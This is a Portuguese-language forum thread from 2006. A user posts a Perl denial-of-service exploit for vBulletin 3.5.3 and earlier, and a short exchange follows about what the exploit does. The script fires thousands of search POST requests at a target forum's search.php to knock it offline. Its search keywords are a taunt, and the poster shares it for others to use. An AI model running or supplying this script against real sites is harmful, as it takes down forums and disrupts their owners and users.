Vbull 3.5.3 DoS

Started by slul, 24 de June , 2006, 12:52:24 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

slul

24 de June , 2006, 12:52:24 AM
Segue abaixo o exploit da segunda versão mais nova do Vbull

Code Select
#!/usr/bin/perl
##########################################
# vBdos.pl - vBulletin <=3.5.3 Search DoS
#
# Written by spic of g00ns
##########################################
# Contact
# Site: www.g00ns.net and www.g00ns-forum.net
# Email: spic <at> g00ns.net
# IRC: irc.g00ns.net #g00ns
##########################################
# Example
# vBdos.pl www.avbforum.com /vbulletin/
##########################################
# Partially ripped from zod32 of g00ns!
# Sorry, zod! :(
# Excuse the messy code :]
##########################################
# Shoutz to
#
# z3r0, ArYa, uid0, zod32, kutmaster,
# felosi, cijfer, wr0ck,
# and the rest of the crew!;)
##########################################

use IO::Socket;
$server= $ARGV[0];
$path=$ARGV[1];


while($x != 9999)
{
$post = "search_keywords=spic+of+g00ns+owned+your+site$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200";

$lrg = length $post;


if(!$server||!$path)
{
print "rn";
print "vBulletin DoS by spic of g00nsn";
print "usage: vBdos.pl <host without http> <directory>rn";
exit();
}



my $sock = new IO::Socket::INET (
PeerAddr => "$server",
PeerPort => "80",
Proto => "tcp",
);
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock;


print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n";
print $sock "Host: $servern";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $servern";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.5n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postn";
close($sock);


syswrite STDOUT,".";

$x++;
}

##########################################

Aproveitem Abraços!

Security

#1
11 de July , 2006, 01:27:55 AM
ele cria varios user né? :P

slul

#2
11 de July , 2006, 05:18:11 PM
Quote from: "Security"ele cria varios user né? :P

na realidade não...

oq ele faz são diversas pesquisas no fórum causando um DoS

Abraços!

Security

#3
11 de July , 2006, 08:56:40 PM
obrigado...
ae acaba offando o forum né hehe :P
abraços !
Print
Go Up Pages1
User actions